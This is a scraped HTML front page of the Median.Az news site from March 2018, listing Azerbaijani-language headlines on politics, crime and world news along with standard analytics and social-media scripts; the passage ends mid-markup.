﻿<!DOCTYPE html>
<html lang="ru-RU">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Median.Az News Agency</title>
<meta name="description" content="Median.Az - Новости Азербайджана и мира. " />
<meta name="keywords" content="Новости Азербайджана" />
<meta name="generator" content="Median.Az (http://median.az)" />
<link rel="search" type="application/opensearchdescription+xml" href="http://median.az/engine/opensearch.php" title="Median.Az News Agency" />
<link rel="alternate" type="application/rss+xml" title="Median.Az News Agency" href="http://median.az/engine/rss.php" />
<script type="text/javascript" src="/engine/classes/min/index.php?charset=UTF-8&amp;g=general&amp;21"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
<div class="main-top hidden-xs hidden-md hidden-sm">
<center>
<img src="http://median.az/uploads/newlogosmall.jpg" border="0" width="280" height="140" alt="" class="img_ad"></a>
<img src="http://median.az/uploads/newlogosmall.jpg" border="0" width="280" height="140" alt="" class="img_ad"></a>
<img src="http://median.az/uploads/newlogosmall.jpg" border="0" width="280" height="140" alt="" class="img_ad"></a>
<img src="http://median.az/uploads/newlogosmall.jpg" border="0" width="280" height="140" alt="" class="img_ad"></a>
</center>
</div>
<meta name="description" content="Median.Az Агенство новостей">
<meta name="theme-color" content="#468996">
<meta name="viewport" content="width=device-width; initial-scale=1.0">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="default">


	<meta name="google-site-verification" content="4WLCmfFl_yRyRjyiclQa3qOpKYNIWhO5YOXgVhge02Y" />
<script language="javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js"></script>
<link rel="shortcut icon" href="/templates/news/images/favicon.ico" type="image/x-icon" />
<link rel="apple-touch-icon" href="/templates/news/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="72x72" href="/templates/news/images/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="114x114" href="/templates/news/images/apple-touch-icon-114x114.png">
<link media="screen" href="/templates/news/css/style.css"  rel="stylesheet" />
<link media="screen" href="/templates/news/css/engine.css"  rel="stylesheet" />
<link media="screen" href="/templates/news/css/adaptive.css"  rel="stylesheet" />
<script src="http://code.jquery.com/jquery-migrate-1.2.1.js"></script>
<script type="text/javascript" src="/templates/news/js/libs.js"></script>
<script type="text/javascript" src="//vk.com/js/api/openapi.js?101"></script>

<link rel="shortcut icon" href="/templates/news/images/favicon.ico">
<link href="/templates/news/style/styles.css" rel="stylesheet">
<link href="/templates/news/style/engine.css" rel="stylesheet">
<link href="/templates/news/style/scrollup.css" rel="stylesheet">
<script src="/templates/news/js/scrollup.js"></script>

<!--Bootstrap-->
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="/templates/news/style/bootstrap.css" rel="stylesheet">
<script src="/templates/news/js/bootstrap.js"></script>
<script src="/templates/news/js/tooltip.js"></script>
<!--[if lt IE 9]><script src="/templates/news/js/ie8-responsive-file-warning.js"></script><![endif]-->

<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
<![endif]-->

<!--Normalize-->
<link href="/templates/news/style/normalize.css" rel="stylesheet">

<!--Google Font-->
<link href='http://fonts.googleapis.com/css?family=PT+Sans&subset=latin,cyrillic' rel='stylesheet' type='text/css'>

</head>
<body>

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v2.5&appId=133298583433309";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<!--[if lt IE 9]>
    <script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
    <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-60839645-1', 'auto');
  ga('send', 'pageview');

</script>
<body>
<script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'e6d70df920bdbccd3b1c1293df308039d7ca8103';
var dle_group      = 5;
var dle_skin       = 'news';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '1';
var dle_act_lang   = ["Hə", "Yox", "Daxil et", "Rədd", "Yaddaşa sal", "Sil", "Yükləmə gedir gözləyin..."];
var menu_short     = 'Təcili redaktə';
var menu_full      = 'Bütünlüklə redaktə';
var menu_profile   = 'Hesaba baxış';
var menu_send      = 'Mesaj göndərmək';
var menu_uedit     = 'Adminmərkəz';
var dle_info       = 'Məlumat';
var dle_confirm    = 'Təsdiq';
var dle_prompt     = 'Məlumat daxil et';
var dle_req_field  = 'Bütün lazımi sahələri doldurun';
var dle_del_agree  = 'Siz həqiqətən silmək istəyirsiniz? Bu hərəkəti rədd etmək mümkün deyil';
var dle_spam_agree = 'Siz həqiqətənmi bu istifadəçini SPAMMER kimi qeyd etmək istəyirsiniz? Bu onun bütün rəylərinizin silinməsinə gətirib çıxaracaq';
var dle_complaint  = 'Admin üçün şikayətin mətnini göstər:';
var dle_big_text   = 'Mətndən cox hissə seçilib.';
var dle_orfo_title = 'Tapılan qramatik səhv üçün adminə rəy yazın';
var dle_p_send     = 'GÖNDƏR';
var dle_p_send_ok  = 'Bildiriş uğurla göndərildi';
var dle_save_ok    = 'Dəyişiklik uğurlu oldu.';
var dle_reply_title= '';
var dle_tree_comm  = '0';
var dle_del_news   = 'Məqaləni sil';
var dle_sub_agree  = '';
var allow_dle_delete_news   = false;

//-->
</script>
<header class="header">
    <!-- Верхний баннер -->
    <div class="wrap cf">
        <h1 class="logo">
           <center> <a href="/"><img src="/templates/news/images/logo.png" alt="" /></a>     </center>       
        </h1>

      
						
	 <div class=" hidden-xs hidden-sm">
	<div style="position: absolute;height: auto;z-index: 1;left: 250px;top: 15px;" id="langweb" align="center">
	
<a href="http://median.az/Az/"><font size="5">&nbsp;AZ</font> </a>
	<br>
	 <a href="http://median.az/Ru/">
	<font size="5" >RU</font></a></div></div>

        
<ul class="social_menu">
	
	
	<li><a href="https://www.facebook.com/Median.Azxeber/"  target="_blank" class="fb_icon" rel="nofollow" title="Facebook"></a></li>
	<li><a href="#"  class="tw_icon" rel="nofollow" title="Twitter"></a></li>
	<li><a href="#"  class="yt_icon" rel="nofollow" title="YouYube"></a></li>
	<li><a href="/engine/rss.php" target="_blank" class="rss_icon" rel="nofollow" title="RSS лента"></a></li>
	
</ul>
		
  
    </div>
	
    <div class="nav-wrap wrap">

        <nav class="nav">            



              <button class="nav-btn"> Menyu</button>
            <ul>
       <li><a href="http://median.az/">ANA SƏHİFƏ</a></li>
<li><a href="http://median.az/index.php?do=cat&category=politika">POLİTİKA</a></li>
<li><a href="http://median.az/index.php?do=cat&category=kriminal">KRİMİNAL</a></li>
<li><a href="http://median.az/index.php?do=cat&category=proiswestviya">HADİSƏ</a></li>
<li><a href="http://median.az/index.php?do=cat&category=obwestvo">CƏMİYYƏT</a></li>
<li><a href="http://median.az/index.php?do=cat&category=ekonomika">İQTİSADİYYAT</a></li>
<li><a href="http://median.az/index.php?do=cat&category=vmire">DÜNYA</a></li>
<li><a href="http://median.az/index.php?do=cat&category=modaikrasota">DƏB</a></li>
<li><a href="http://median.az/index.php?do=cat&category=shoubiznes">ŞOU BİZNES</a></li>

<li><a href="http://median.az/index.php?do=cat&category=etointeresno">MARAQLI</a></li>
<li><a href="http://median.az/index.php?do=cat&category=medicinaizdorovye">SAĞLAMLIQ</a></li>
<li><a href="http://median.az/index.php?do=cat&category=intervyu">MÜSAHİBƏ</a></li>	
<li><a href="http://median.az/index.php?do=cat&category=sport">İDMAN</a></li>	
<li><a href="http://median.az/index.php?do=cat&category=avtoimoto">AVTO VƏ МОТО</a></li>	
<li><a href="http://median.az/index.php?do=cat&category=war">ORDU</a></li>	
<li><a href="http://median.az/index.php?do=cat&category=help">XEYİRXAHLIQ</a></li>	
<li><a href="http://median.az/index.php?do=cat&category=afisha">AFİŞA</a></li>	

            </ul>
        </nav>
		
        <div class="searchblock">
            <button class="search_btn"></button>
            <div class="search_panel">
                <form method="post" action="">
                    <input type="hidden" name="do" value="search" />
                    <input type="hidden" name="subaction" value="search" />
                    <input id="story" name="story" type="text" value="Поиск" onfocus='if (this.value == "Поиск") { this.value=""; }' onblur='if (this.value == "") { this.value="Поиск"; }' class="searchform" />
                    <input class="searchbt" title="Найти" type="button" value=" " />
                </form>
				
            </div>
									<div class="hidden-lg  hidden-md">	
<div style="position: absolute;width: -webkit-fill-available;height: auto;z-index: 111;right: 170px;top: 10px;" id="mobilemenu" align="center">
	<a href="http://median.az/Az/"><font size="4"><font color="#FFFFFF">AZ</font></font><font color="#FFFFFF">
	</font> </a><font color="#FFFFFF" size="4">| </font> <a href="http://median.az/Ru/">
	<font size="4" color="#FFFFFF">RU</font></a></div></div>
        </div>
		
    </div>
		  <div class="main-top hidden-xs">
     	<tbody><tr>  
<marquee style="color: rgb(0, 0, 0);" width="100%">  
<h5><i><body link="red" vlink="#cecece" alink="#ff0000" bgcolor="black"><a href="http://median.az/index.php?newsid=64066" target="_blank"><font color="white">19:00 Dünyanın ən bədbəxt 26 ölkəsi – SİYAHI&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64064" target="_blank"><font color="white">18:45 Jirinovski Azərbaycanın Rusiyaya birləşdirilməsi planlarından danışdı&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64062" target="_blank"><font color="white">18:23 Lənkəranda dəhşət – Çörək yapmaq istəyən qadın təndirdə diri-diri yandı&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64061" target="_blank"><font color="white">18:14 Ukraynada ermənilərin hücumuna məruz qalan azərbaycanlı biznesmen ağır xəsarət alıb&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64060" target="_blank"><font color="white">18:11 Biabırçılıq: Bayram günləri Pirşağı qəbiristanlığına gedən yolu zibilxanaya çevirdilər - FOTO&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64058" target="_blank"><font color="white">17:36 Avtovağzalda avtobus problemi: Qiymətlər də artırıldı - VİDEO&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64057" target="_blank"><font color="white">17:08 Rusiyada prezident seçkilərinin yekun nəticələri açıqlanıb, Putin 76,69% səs topladı&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64054" target="_blank"><font color="white">16:58 Rusiyanın ən müasir silahlarının videoçarxı təqdim olundu&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64053" target="_blank"><font color="white">16:57 Sabahdan seçki bülletenlərinin çapına başlanılacaq&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64052" target="_blank"><font color="white">16:53 Əli Həsənov “Amerikanın səsi”nə sözardı yazdı: “Düşünürəm ki…”&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64051" target="_blank"><font color="white">14:21 Ömrü uzatmağın asan yolu tapıldı&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64050" target="_blank"><font color="white">14:12 Gürcüstana 40 kq qızıl-gümüş keçirməyə çalışan azərbaycanlı saxlanılıb&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64049" target="_blank"><font color="white">13:56 Səmra Rəhimlidən erməni etirafı: "Səhnədə məni itələdi" - VİDEO&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64044" target="_blank"><font color="white">13:43 Ata evə gec gələn qızının dodaqlarını kəsdi&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64041" target="_blank"><font color="white">13:31 Avstraliyada 150 delfin özünü sahilə atıb - VİDEO&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64040" target="_blank"><font color="white">13:29 MSK-nın sədr müavini: Prezident seçkilərində bütün seçicilərin iştirakını təmin etmək üçün zəruri tədbirlər görülür&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64039" target="_blank"><font color="white">13:27 Bir ölkə sakininin orta hesabla aylıq xərci - STATİSTİKA&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64038" target="_blank"><font color="white">13:24 Evləri sökülən bəzi vətəndaşlar narazıdır, qiymətlər isə bahalaşır - FOTOLAR&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64037" target="_blank"><font color="white">13:22 Azərbaycanda "saxta" vəkilləri cəzalandıracaqlar&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font><a href="http://median.az/index.php?newsid=64036" target="_blank"><font color="white">13:22 Bu məhşur “Qədim Azərbaycan qadını” obrazını canlandırdı - FOTOLAR&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; </font></h5></i>
</marquee></td>  
</tr></tbody></table>  </div>
  </div>
</header>

<div class="container" id="mains">
  <div class="row row-offcanvas row-offcanvas-right">
  
    <div class="col-md-9">
	
	<div class="main-top hidden-xs hidden-md hidden-sm">


	<font size="3" face="bookman old style"><pre>Redaksiyaya məktub: editor@median.az    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Qaynar xətt 24/7 : +994 (055) 676 36 36  <img src="http://median.az/templates/new/images/whatsapp.png" alt="Whatsapp" width="25" height="25" ></pre></font>
			
	   
<br>

       <link media="screen" href="/templates/news/slider/style.css" type="text/css" rel="stylesheet" />

<script src="/templates/news/slider/jquery.bxslider.min.js"></script>
<script src="/templates/news/slider/slide.js"></script>

<div class="slider">

	<div class="slider-wrapper">
		<ul id="slider">
			<li><a href="http://median.az/index.php?newsid=63814"><img src="http://median.az/uploads/posts/2018-03/1521445583_politik.jpg" width="500" height="300"/></a></li>
			<li><a href="http://median.az/index.php?newsid=63694"><img src="http://median.az/uploads/posts/2018-03/thumbs/1521208735_prezident.jpg" width="500" height="300"/></a></li>
		    <li><a href="http://median.az/index.php?newsid=63648"><img src="http://median.az/uploads/posts/2018-03/1521187059_prezident.jpg" width="500" height="300"/></a></li>
		    <li><a href="http://median.az/index.php?newsid=63512"><img src="http://median.az/uploads/posts/2018-03/1521039003_prezident.jpg" width="500" height="300"/></a></li>
		    <li><a href="http://median.az/index.php?newsid=63376"><img src="http://median.az/uploads/posts/2018-03/1520953110_po.jpg" width="500" height="300"/></a></li>
		

		</ul>
	</div><!-- .slider-wrapper -->

	<ul id="slider-pager" class="pager">
		<li><a href="#">	<a href="http://median.az/index.php?newsid=63814"><font size="3">İlham Əliyev Putini təbrik etdi</font></a></h2> </span></a></li>
		<li><a href="#">	<a href="http://median.az/index.php?newsid=63694"><font size="3">Prezident xalqı təbrik etdi</font></a></h2> </span></a></li>
		<li><a href="#">	<a href="http://median.az/index.php?newsid=63648"><font size="3">İlham Əliyev Heydər Əliyevlə Putinin ilk görüşündən danışdı – VİDEO</font></a></h2> </span></a></li>
		<li><a href="#">	<a href="http://median.az/index.php?newsid=63512"><font size="3">İlham Əliyev xəstəxana tikintisinə 7,5 milyon manat ayırdı</font></a></h2> </span></a></li>
		<li><a href="#">	<a href="http://median.az/index.php?newsid=63376"><font size="3">İlham Əliyev Qarabağ əlilləri və şəhid ailələri ilə bağlı sərəncam verdi</font></a></h2> </span></a></li></ul>

</div><!-- .slider -->  <br><br>
	 
	 
	  

		

      </div>
	      
  
     
      
      <div id='dle-content'>
<a href="http://median.az/index.php?newsid=64066" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521817215_o.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Dünyanın ən bədbəxt 26 ölkəsi – SİYAHI</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 382  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 19:00
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64064" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521816403_v.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Jirinovski Azərbaycanın Rusiyaya birləşdirilməsi planlarından danışdı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 287  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 18:45
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64062" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521815014_p.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Lənkəranda dəhşət – Çörək yapmaq istəyən qadın təndirdə diri-diri yandı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 328  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 18:23
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64061" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521814593_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Ukraynada ermənilərin hücumuna məruz qalan azərbaycanlı biznesmen ağır xəsarət alıb</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 436  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 18:14
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64060" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521814264_1.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Biabırçılıq: Bayram günləri Pirşağı qəbiristanlığına gedən yolu zibilxanaya çevirdilər - FOTO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 553  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 18:11
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64058" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521812134_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Avtovağzalda avtobus problemi: Qiymətlər də artırıldı - VİDEO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 498  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 17:36
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64057" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521810539_v.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Rusiyada prezident seçkilərinin yekun nəticələri açıqlanıb, Putin 76,69% səs topladı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 294  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 17:08
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64054" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521809949_v.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Rusiyanın ən müasir silahlarının videoçarxı təqdim olundu</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 343  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 16:58
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64053" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521809834_po.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Sabahdan seçki bülletenlərinin çapına başlanılacaq</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 312  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=politika"> 	<i class="glyphicon glyphicon-th-list"></i> Politika  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 16:57
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64052" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521809707_z.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Əli Həsənov “Amerikanın səsi”nə sözardı yazdı: “Düşünürəm ki…”</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 581  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 16:53
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64051" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521799374_et.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Ömrü uzatmağın asan yolu tapıldı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 376  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=etointeresno"> 	<i class="glyphicon glyphicon-th-list"></i> Maraqlı  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 14:21
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64050" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521799358_kr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Gürcüstana 40 kq qızıl-gümüş keçirməyə çalışan azərbaycanlı saxlanılıb</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 303  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 14:12
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64049" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521799034_w.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Səmra Rəhimlidən erməni etirafı: "Səhnədə məni itələdi" - VİDEO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 904  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=shoubiznes"> 	<i class="glyphicon glyphicon-th-list"></i> Şou Biznes  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:56
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64044" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521798267_kr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Ata evə gec gələn qızının dodaqlarını kəsdi</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 1 146  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:43
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64041" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521797513_v.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Avstraliyada 150 delfin özünü sahilə atıb - VİDEO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 452  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:31
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64040" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521797329_po.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
